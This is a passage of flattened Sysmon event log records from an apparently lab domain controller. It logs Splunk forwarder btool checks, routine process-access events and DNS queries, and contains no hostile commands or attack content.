Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.669{59A5CD1D-8E59-6005-4C00-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E59-6005-4B00-00000000A301}4064C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000001912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E59-6005-4B00-00000000A301}4064C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E59-6005-4B00-00000000A301}4064C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E59-6005-4B00-00000000A301}4064C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.662{59A5CD1D-8E59-6005-4B00-00000000A301}4064C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E59-6005-4A00-00000000A301}4028C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.611{59A5CD1D-8E59-6005-4A00-00000000A301}40284032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000001897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.872{59A5CD1D-8E44-6005-0B00-00000000A301}856win-dc-495010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.870{59A5CD1D-8E56-6005-2C00-00000000A301}2588win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 22542200x80000000000000001895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.868{59A5CD1D-8E56-6005-2C00-00000000A301}2588localhost0::1;::ffff:127.0.0.1;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 10341000x80000000000000001894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E59-6005-4A00-00000000A301}4028C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 